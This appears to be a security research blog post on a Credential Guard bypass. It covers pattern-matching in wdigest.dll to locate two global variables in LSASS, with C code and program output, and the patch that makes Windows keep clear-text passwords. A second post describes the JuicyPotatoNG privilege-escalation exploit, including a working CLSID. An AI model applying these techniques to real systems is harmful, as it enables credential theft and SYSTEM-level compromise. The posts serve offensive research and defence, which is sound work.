As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, there are two lsass.exe processes, the usual one and one running inside a Hyper-V Virtual Machine. Accessing the juicy stuff in this isolated lsass.exe process therefore means breaking the hypervisor, which is not an easy task.

Source: https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-how-it-works

Though, in August 2020, an article was posted on Team Hydra’s blog with the following title: Bypassing Credential Guard. In this post, @N4k3dTurtl3 discussed a very clever and simple trick. In short, the too well-known WDigest module (wdigest.dll), which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their name is rather self explanatory, the first one holds the state of Credential Guard within the module (is it enabled or not?), the second one determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard was not enabled and if the system was configured to keep clear-text passwords in memory. Once these two values have been properly patched within the LSASS process, the latter will keep a copy of the users’ password when the next authentication occurs. In other words, you won’t be able to access previously stored credentials but you will be able to extract clear-text passwords afterwards.

The implementation of this technique is rather simple. You first determine the offsets of the two global variables by loading wdigest.dll in a disassembler or a debugger along with the public symbols (the offsets may vary depending on the file version). After that, you just have to find the module’s base address to calculate their absolute address. Once their location is known, the values can be patched and/or restored in the target lsass.exe process.

The original PoC is available here. I found two other projects implementing it: WdToggle (a BOF module for Cobalt Strike) and EDRSandblast. All these implementations rely on hardcoded offsets, but is there a more elegant way? Is it possible to find them at run-time?

We need a plan

If we want to find the offsets of these two variables, we first have to understand how and where they are stored. So let’s fire up Ghidra, import the file C:\Windows\System32\wdigest.dll, load the public symbols and analyze the whole.

Loading the symbols allows us to quickly find these two values from the Symbol Tree. What we learn there is that g_IsCredGuardEnabled and g_fParameter_UseLogonCredential are two 4-byte values (i.e. double words / DWORD values) that are stored in the R/W .data section, nothing surprising about this.

If we take a look at what surrounds these two values, we can see that there is just a bunch of uninitialized data. And even once the module is loaded, there is most probably no particular marker that we will be able to leverage for identifying their location. It is like searching for a needle in a haystack, with the added challenge of not being able to distinguish the needle from the rest of the hay.

So, searching directly in the .data section is definitely not the way to go. There is a better approach, rather than searching for these values, we can search for cross references! The reason for these global variables to even exist in the first place is because they are used somewhere in the code. Therefore, if we can find these references, we can also find the variables.

Ghidra conveniently lists all the cross-references in the “Listing” view, so let’s see if there is anything interesting.

Two cross-references immediately stand out - SpAcceptCredentials and SpInitialize - as they are common to both variables. If we can limit the search to a single place, the whole process will certainly be a bit easier. On top of that, looking at these two functions in the symbol tree, we can see that SpInitialize is exported by the DLL, which means that we can easily get its address with a call to GetProcAddress() for instance.

We can go to the “Decompile” view and have a glimpse at how these variables are used within the SpInitialize function.

The RegQueryValueExW call is interesting because the x86 opcode of a function call is rather easy to identify. From there, we could then work backwards and see how the fifth argument is handled. This is a potential avenue to consider so let’s keep it in mind.

That would be a way to identify the g_fParameter_UseLogonCredential variable but what about g_IsCredGuardEnabled? The code from the “Decompile” view is not that easy to interpret as is, so we will have to go a bit deeper.

g_IsCredGuardEnabled = (uint)((*(byte *)(param_2 + 1) & 0x20) != 0);

Here, I found the assembly code to be less confusing.

mov r15,param_2
; ...
test byte ptr [r15 + 0x4],0x20
cmovnz eax,esi
mov dword ptr [g_IsCredGuardEnabled],eax

First, the second parameter of the function call - param_2 - is loaded into the R15 register. Then, it is incremented by 0x04, dereferenced and finally compared against the value 0x20.

The function Spinitialize is documented here. The documentation tells us that the second parameter is a pointer to a SECPKG_PARAMETERS structure.

NTSTATUS Spinitializefn(
  [in] ULONG_PTR PackageId,
  [in] PSECPKG_PARAMETERS Parameters,
  [in] PLSA_SECPKG_FUNCTION_TABLE FunctionTable
)

The structure SECPKG_PARAMETERS is documented here. The attribute located at the offset 0x04 in the structure (c.f. byte ptr [R15 + 0x4]) is MachineState.

typedef struct _SECPKG_PARAMETERS {
  ULONG          Version;
  ULONG          MachineState;
  ULONG          SetupMode;
  PSID           DomainSid;
  UNICODE_STRING DomainName;
  UNICODE_STRING DnsDomainName;
  GUID           DomainGuid;
} SECPKG_PARAMETERS, *PSECPKG_PARAMETERS, SECPKG_EVENT_DOMAIN_CHANGE, *PSECPKG_EVENT_DOMAIN_CHANGE;

The documentation provides a list of possible flags for the MachineState attribute but it does not tell us what flag corresponds to the value 0x20. However it does tell us that the SECPKG_PARAMETERS structure is defined in the header file ntsecpkg.h. If so, we should find it in the Windows SDK, along with the SECPKG_STATE_* flags.

// Values for MachineState

#define SECPKG_STATE_ENCRYPTION_PERMITTED               0x01
#define SECPKG_STATE_STRONG_ENCRYPTION_PERMITTED        0x02
#define SECPKG_STATE_DOMAIN_CONTROLLER                  0x04
#define SECPKG_STATE_WORKSTATION                        0x08
#define SECPKG_STATE_STANDALONE                         0x10
#define SECPKG_STATE_CRED_ISOLATION_ENABLED             0x20
#define SECPKG_STATE_RESERVED_1                   0x80000000

Here we go! The value 0x20 corresponds to the flag SECPKG_STATE_CRED_ISOLATION_ENABLED, which makes quite a lot of sense in our case. In the end, the previous line of C code could simply be rewritten as follows.

g_IsCredGuardEnabled = (param_2->MachineState & SECPKG_STATE_CRED_ISOLATION_ENABLED) != 0;

Note: I could have also helped Ghidra a bit by defining this structure and editing the prototype of the SpInitialize function to achieve a similar result.

That’s all very well, but do we have clear opcode patterns to search for? The answer is “not really”… Prior to the RegQueryValueExW call, a reference to g_fParameter_UseLogonCredential is loaded in RAX, that’s a rather common operation and we cannot rely on the fact that the compiler will use the same register every time. After the call to RegQueryValueExW, g_fParameter_UseLogonCredential is set to 0 in an if statement. Again this is a generic operation so it is not good enough for establishing a pattern. As for g_IsCredGuardEnabled, there is an interesting set of instructions but we cannot rely on the fact that the compiler will produce the same code every time here either.

; Before the call to RegQueryValueExW
; 180003180 48 8d 05 2d 30 03 00
lea     rax,[g_fParameter_UseLogonCredential]
; ...
; 18000318e 48 89 44 24 20
mov     qword ptr [rsp + local_b8],rax=>g_fParameter_UseLogonCredential
; After the call to RegQueryValueExW
; 1800031b1 44 89 25 fc 2f 03 00
mov     dword ptr [g_fParameter_UseLogonCredential],r12d
; Test on param_2->MachineState
; 18000299b 41 f6 47 04 20
test    byte ptr [r15 + 0x4],0x20
; 1800029a0 0f 45 c6
cmovnz  eax,esi
; 1800029a3 89 05 5f 32 03 00
mov     dword ptr [g_IsCredGuardEnabled],eax

We are (almost) back to square one. However, we had a second option - SpAcceptCredentials - so let’s try our luck with this function. As it turns out, the two variables seem to be used in a single if statement as we can see in the “Decompile” view.

The original assembly consists of a CMP instruction, followed by a MOV instruction.

; 180001839 39 1d 75 49 03 00
cmp     dword ptr [g_fParameter_UseLogonCredential],ebx
; 18000183f 8b 05 c3 43 03 00
mov     eax,dword ptr [g_IsCredGuardEnabled]
; 180001845 0f 85 9c 77 00 00
jnz     LAB_180008fe7

Since the public symbols were imported and the PE file was analyzed, Ghidra conveniently displays the references to the variables rather than addresses or offsets. To better understand how this works though, we should have a look at the “raw” assembly code.

cmp    dword ptr [rip + 0x34975],ebx  ; 39 1d 75 49 03 00
mov    eax,dword ptr [rip + 0x343c3]  ; 8b 05 c3 43 03 00
jnz    0x77ae                         ; 0f 85 9c 77 00 00

On the first line, the first byte - 39 - is the opcode of the CMP instruction to compare a 16 or 32 bit register against a 16 or 32 bit value in another register or a memory location. Then, 1d represents the source register (EBX in this case). Finally, 75 49 03 00 is the little endian representation of the offset of g_fParameter_UseLogonCredential relative to RIP (rip+0x34975). The second line works pretty much the same way although it is a MOV instruction.

The third line represents a conditional jump, which won’t help us establish a reliable pattern. If we consider only the first two lines though, we can already build a potential pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. We just make the reasonable assumption that the offsets won’t exceed the value 0x00ffffff.

No need to say that this is not great but there is still room for improvement so let’s test it first and see if it is at least good enough as a starting point. For that matter, Ghidra has a convenient “Search Memory” tool that can be used to search for byte patterns.

To my surprise, this simple pattern yielded only one result in the entire file. Of course, it is not completely relevant because the PE file also has uninitialized data that could contain this pattern once it is loaded. Though, to address this issue, we can very well limit the search to the .text section because it is not subject to modifications at run-time.

There is still one last problem. I tested the pattern against a single file. What if this pattern is not generic enough or what if it yields false positives in other versions of wdigest.dll? If only there was an easy way to get my hands on multiple versions of the file to verify that…

And here comes the The Windows Binaries Index (or “Winbindex”). This is a nicely designed web application that aggregates all the metadata from update packages released by Microsoft. It also provides a link whenever the file is available for download. Kudos to @m417z for this tool, this is a game changer. From the home page, I can simply search for wdigest.dll and virtually get access to any version of the file.

Apart from the version installed in my VM (10.0.19041.388), I tested the above pattern against the oldest (10.0.10240.18638 - Windows 10 1507) and the most recent version I could find (10.0.22000.434 - Windows 11 21H2) and it worked amazingly well in both cases.

It looks like a plan is starting to emerge. In the end, the overall idea is pretty simple. We have to read the DLL, locate the .text section and simply search for our pattern in the raw data. From the matching buffer, we will then be able to extract the variable offsets and adjust them (more on that later).

Practical implementation

Let me quickly recap what we are trying to achieve. We want to read and patch two global variables within the wdigest.dll module. Because of their nature, these two variables are located in the R/W .data section, but they are not easy to locate as they are just simple boolean flags. However, we identified some code in the .text section that references them. So, the idea is to first extract their offsets from the assembly code, and then get the base address of the target module to find their exact location in the lsass.exe process.

Searching for our code pattern

We want to find a portion of the code that matches the pattern 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. To do so, we have to first locate the .text section of the wdigest.dll PE file. There are two ways to do this. We can either load the module in the memory of our process or read the file from disk. I decided to go for the second option (for no particular reason).

Locating the .text section is easy. The first bytes of the PE file contain the DOS header, which gives us the offset to the NT headers (e_lfanew). In the NT headers, we find the FileHeader member, which gives us the number of sections (NumberOfSections).

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    // ...
    LONG   e_lfanew;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    // ...
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

We can then simply iterate the section headers that are located after the NT headers, until with find the one with the name .text.

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    // ...
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    // ...
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

Once we have identified the section header corresponding to the .text section, we know its size and offset in the file. With that knowledge, we can invoke SetFilePointer to move our pointer of PointerToRawData bytes from the beginning of the file and read SizeOfRawData bytes into a pre-allocated buffer.

// hFile = CreateFileW(L"C:\\Windows\\System32\\wdigest.dll", ...);
PBYTE pTextSection = (PBYTE)LocalAlloc(LPTR, SectionHeader.SizeOfRawData);
SetFilePointer(hFile, SectionHeader.PointerToRawData, NULL, FILE_BEGIN);
ReadFile(hFile, pTextSection, SectionHeader.SizeOfRawData, NULL, NULL);

Then, it is just a matter of reading the buffer, which I did with a simple loop. When I find the byte 0x39, which is the first byte of the pattern, I simply check the following 11 bytes to see if they also match.

// Pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00
j = 0;
while (j < sh.SizeOfRawData) {
  if (pTextSection[j] == 0x39) {
    if ((pTextSection[j + 5] == 0x00) && (pTextSection[j + 6] == 0x8b) && (pTextSection[j + 11] == 0x00)) {
          wprintf(L"Match at offset: 0x%04x\r\n", SectionHeader.VirtualAddress + j);
    }
  }
}

However, I do not stop at the first occurrence. As a simple safeguard, I check the entire section and count the number of times the pattern is matched. If this count is 0, obviously this means that the search failed. But if the count is greater than 1, I also consider that it failed. I want to make sure that the pattern matches only once.

Just for testing purposes and out of curiosity, I also tried several variants of the pattern to sort of see how efficient it was. Surprisingly, the count dropped very quickly with only two occurrences for the variant #2.

Variant Pattern Occurrences
1 39 .. .. .. .. 00 .. .. .. .. .. .. 98
2 39 .. .. .. .. 00 8b .. .. .. .. .. 2
3 39 .. .. .. .. 00 8b .. .. .. .. 00 1

If we execute the program, here is what we get so far. We have exactly one match at the offset 0x1839.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

For good measure, we can verify if the offset 0x1839 is correct by going back to Ghidra. And indeed, the code we are interested in starts at 0x180001839.

Note: the value 0x180000000 is the default base address of the PE. This value can be found in NtHeaders.OptionalHeader.ImageBase.

Extracting the variable offsets

Below are the bytes that we were able to extract from the .text section, and their equivalent x86_64 disassembly.

cmp    dword ptr [rip + 0x34975], ebx   ; 39 1D   75 49 03 00
mov    eax, dword ptr [rip + 0x343c3]   ; 8B 05   C3 43 03 00

And here is the thing I intentionally glossed over in the first part. Since I am no used to reading assembly code, these two lines initially puzzled me. I was expecting to find the addresses of the two variables directly in the code, but instead, I found only RIP-relative offsets.

I learned that the x86_64 architecture indeed uses RIP-relative addressing to reference data. As explained in this post, the main advantage of using this kind of addressing is that it produces Position Independent Code (PIC).

The RIP-relative address of g_fParameter_UseLogonCredential is rip+0x34975. We found the code at the address 0x00001839, so the absolute offset of g_fParameter_UseLogonCredential should be 0x00001839 + 0x34975 = 0x361ae, right?

But the offset is actually 0x361b4. Oh, wait… When an instruction is executed, RIP actually already points to the next one. This means that we must add 6, the length of the CMP instruction, to this value: 0x00001839 + 6 + 0x34975 = 0x361b4. Here we go!

We apply the same method to the second variable - g_IsCredGuardEnabled - and we find: 0x00001839 + 6 + 6 + 0x343c3 = 0x35c08.

We identified the 12 bytes of code and we know their offset in the PE, so the implementation is pretty easy. The RIP-relative offsets are stored using the little endian representation, so we can directly copy the four bytes into DWORD temporary variables if we want to interpret them as unsigned long values.

DWORD dwUseLogonCredentialOffset, dwIsCredGuardEnabledOffset;

RtlMoveMemory(&dwUseLogonCredentialOffset, &Code[2], sizeof(dwUseLogonCredentialOffset));
RtlMoveMemory(&dwIsCredGuardEnabledOffset, &Code[8], sizeof(dwIsCredGuardEnabledOffset));
dwUseLogonCredentialOffset += 6 + dwCodeOffset;
dwIsCredGuardEnabledOffset += 6 + 6 + dwCodeOffset;

wprintf(L"Offset of g_fParameter_UseLogonCredential: 0x%08x\r\n", dwUseLogonCredentialOffset);
wprintf(L"Offset of g_IsCredGuardEnabled: 0x%08x\r\n", dwIsCredGuardEnabledOffset);

And here is the result.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08

Finding the base address

Now that we know the absolute offsets of the two global variables, we must determine their absolute address in the target process lsass.exe. Of course, this part was already implemented in the original PoC, using the following method:

  1. Open the lsass.exe process with PROCESS_ALL_ACCESS.
  2. List the loaded modules with EnumProcessModules.
  3. For each module, call GetModuleFileNameExA to determine whether it is wdigest.dll.
  4. If so, call GetModuleInformation to get its base address.

Ideally, we would like to interact as less as possible with LSASS, but as we need to patch it anyway, this method works perfectly fine. I just wanted to take this opportunity to present another approach and discuss some aspects of Windows DLLs.

The key thing is that the base address of a module is determined when it is first loaded. Therefore, any subsequent process loading this module will use the exact same base address. In our case, this means that if we load wdigest.dll in our current process, we will be able to determine its base address without even having to touch LSASS. (I will admit that this sounds a bit dumb because the whole purpose is to eventually patch it.)

Loading a DLL is commonly done through the Windows API LoadLibraryW or LoadLibraryExW. The documentation states that they return “a handle to the module”, but I would say that it is a bit misleading. These functions actually return a HMODULE, which is not a typical kernel object HANDLE. In reality, the HMODULE value is… the base address of the module.

In conclusion, we can get the base address of wdigest.dll in the lsass.exe process simply by running the following code in our own context. One could argue that loading wdigest.dll might look suspicious, but it is nothing compared to patching LSASS anyway so this is not really my concern here.

HMODULE hModule;
if ((hModule = LoadLibraryW(L"wdigest.dll")))
{
  wprintf(L"Base address of wdigest.dll: 0x%016p\r\n", hModule);
  FreeLibrary(hModule);
}

After adding this to my own PoC and calculating the addresses, here is what I get. Not bad!

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08
Base address of wdigest.dll: 0x00007FFEE32B0000
Address of g_fParameter_UseLogonCredential: 0x00007ffee32e61b4
Address of g_IsCredGuardEnabled: 0x00007ffee32e5c08

We can confirm that the base address of wdigest.dll is the same by inspecting the memory of the lsass.exe process using Process Hacker for instance.

Conclusion

The first thing I want to say is thank you to @N4k3dTurtl3 for the initial post on this subject. I really liked the simplicity and efficiency of this trick. It always amazes me how this kind of hack can defeat really advanced protections such as Credential Guard.

Now, the question is, as a pentester (or a red teamer), should you use the technique I described in this post? The idea of not having to rely on hardcoded offsets and therefore running code that is version-independent is attractive. However, it might also be a bit riskier as pattern matching is not an exact science. To address this, I implemented a safeguard which consists in ensuring that the pattern is matched exactly once. This leaves us with only one potential false positive: the pattern could be matched exactly once on a random portion of code, which seems rather unlikely. The only risk I see is that Microsoft could slightly change the implementation so that my pattern just no longer works.

As for defenders, enabling Credential Guard should not refrain you from enabling LSA protection as well. We all know that it can be completely bypassed, but this operation has a cost for an attacker. It requires to run code in the Kernel or use a sophisticated userland bypass, which both create avenues for detection. As rightly said by @N4k3dTurtl3:

The goal is to increase the cost in time, effort, and tooling […] thus making your network less appealing as a target and increasing opportunities for detection and response.

Lastly, this was a cool little challenge, not too difficult, and as always I learned a few things along the way, the perfect recipe. Oh, and if you have read this far, you can find my PoC here.

Links & Resources

An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

A few days ago, I released Perfusion, an exploit tool for the RpcEptMapper registry key vulnerability that I discussed in my previous post. Here, I want to discuss the strategy I opted for when I developed the exploit. Although it is not as technical as a memory corruption exploit, I still learned a few tricks that I wanted to share. In the Previous Episode… Before we begin, here is a brief s...

Do You Really Know About LSA Protection (RunAsPPL)?

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days. Introdu...

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area. RPC as a Fuzzing Target? As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX sy...

From RpcView to PetitPotam

In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool. The Theory Before diving into the main subject, I need to discuss so...

Revisiting a Credential Guard Bypass

You probably have already heard or read about this clever Credential Guard bypass which consists in simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead. Background As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, t...

Bypassing LSA Protection in Userland

In 2018, James Forshaw published an article in which he briefly mentioned a trick that could be used to inject arbitrary code into a PPL as an administrator. However, I feel like this post did not get the attention it deserved as it literally described a potential Userland exploit for bypassing PPL (which includes LSA Protection). Introduction I was doing some research on Protected Processes ...

The End of PPLdump

A few days ago, an issue was opened for PPLdump on GitHub, stating that it no longer worked on Windows 10 21H2 Build 19044.1826. I was skeptical at first so I fired up a new VM and started investigating. Here is what I found… PPLdump in a nutshell If you are reading this, I would assume that you already know what PPLdump is and what it does. But just in case you do not, here is a very brief s...

Giving JuicyPotato a second chance: JuicyPotatoNG

Well, it’s been a long time ago since our beloved JuicyPotato has been published. Meantime things changed and got fixed (backported also to Win10 1803/Server2016) leading to the glorious end of this tool which permitted to elevate to SYSTEM user by abusing impersonation privileges on Windows systems.

With Juicy2 it was somehow possible to circumvent the protections MS decided to implement in order to stop this evil abuse but there were some constraints, for example requiring an external non Windows machine redirecting the OXID resolution requests.

The subset of CLSID’s to abuse was very restricted (most of them would give us an Identification token), in fact it worked only on Windows10/11 versions with the “ActiveX Installer Service”. The “PrintNotify” service was also a good candidate (enabled also on Windows Server versions) but needed to belong to the “INTERACTIVE” group which in fact limited the abuse of service accounts.

When James Forshaw published the post about relaying Kerberos DCOM authentication which is also an evolution of our “RemotePotato0” we reconsidered the limitation given that he demonstrated that it was possible to do everything on the same local machine.

The “INTERACTIVE” constraint could also be easily bypassed as demonstrated by @splinter_code’s magic RunasCs tool.

Putting all the pieces together was not that easy and I have to admit I’m really lazy in coding, so I asked my friend (and coauthor in the *potato saga) @splinter_code for help. He obviously accepted the engagement 🙂

How we implemented it

The first thing we implemented was Forshaw’s “trick” for resolving Oxid requests to a local COM server on a randomly selected port.
We spoofed the image filename of our running process to “System” for bypassing the windows firewall restriction (if enabled) and decided to use port 10247 as the default port given that in our tests this port was generally available locally to a low privileged user.

When we want to activate a COM object we need to take into consideration the security permissions configured. In our case the PrintNotify service had the following Launch and Activation permission:

Given that the INTERACTIVE group was needed for activating the PrintNotify object (identified by the CLSID parameter), we used the following “trick”:

When using LogonUser() API call with Logon Type 9 (NewCredentials), LSASS will build a copy of our token and will add the INTERACTIVE sid along with others, e.g. the new logon session created sid. Due to the fact we created this token through LogonUser() and explicit credentials we don’t need impersonation privileges to impersonate it. Of course, the credentials are fake, but that doesn’t matter as they will be used only over the network while the original caller identity will be used locally.

Last but not least, we needed to capture the authentication in order to impersonate the SYSTEM user. The most obvious solution was to write our own RPC server listening on port 10247 and then simply call RpcImpersonateClient().
However, this was not possible. That’s because when we register our RPC server binding information through RpcServerUseProtseqEp(), the RPC runtime will bind to the specified port and this port will be “busy” for others that try using it.
We could have implemented some hack to enumerate the socket handles in our process and hijack the socket, but that was an unnecessary heavy load of code.

So we decided to implement an SSPI hook on AcceptSecurityContext() function which would allow us to intercept the authentication and get the SYSTEM token to impersonate:

Using this approach through an SSPI hook instead of relying on RpcImpersonateClient() has the double advantage to make this exploit work even when holding only SeAssignPrimaryTokenPrivilege. As you may know the RpcImpersonateClient() requires your process to hold the SeImpersonatePrivilege, so that would have added an unnecessary limitation.

The JuicyPotatoNG TOOL

The source code of JuicyPotatoNG written in Visual Studio 2019 c++ can be downloaded here.

The Port problem

As mentioned, we choose the default COM server port “10247” but sometimes you can run into a situation where the port is not available. The following simple powershell script will help you to find the available ports, just choose the one not already in use and you’re done.

Countermeasures

Be aware, this is not considered by MS a “Security Boundary” violation. Abusing impersonation privileges is an expected behavior 😉

So what can we do in order to protect ourselves?

First of all, service accounts and accounts with these privileges should be protected by strong passwords and strict access policies, and in case of service accounts “Virtual service accounts” or “Group Managed Service Accounts” should be used. You could also consider removing unnecessary privileges as described in of of my posts but this is not totally secure too…

In this particular case, just disabling the “ActiveX Installer Service” and the “Print Notify Service” will inhibit our exploit (and has no serious impact). But remember there could be “third parties” CLSID’s with SYSTEM impersonation too..

Conclusions

This post is the demonstration that you should never give up and always push the limits one step further 🙂 … and we have other *potato ready, so stay tuned!

Special thanks to the original “RottenPotato” developers, Giuseppe Trotta, and as usual to James Forshaw

That’s all 😉

Update

It seems that Microsoft “fixed” the INTERACTIVE trick and JuicyPotatoNG stopped working. But guess what, there is another CLSID which does not require the INTERACTIVE group and impersonates SYSTEM: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}

Runs only on win11/2022…

Authors of this post: @decoder_it, @splinter_code

Debugging Protected Processes

Whenever I need to debug a protected process, I usually disable the protection in the Kernel so that I can attach a User-mode debugger. This has always served me well until it sort of backfired. The problem with protected processes The problem with protected processes, when it comes to debugging, is basically that they are… protected. Jokes aside, this means that, as you know, you cannot atta...
❌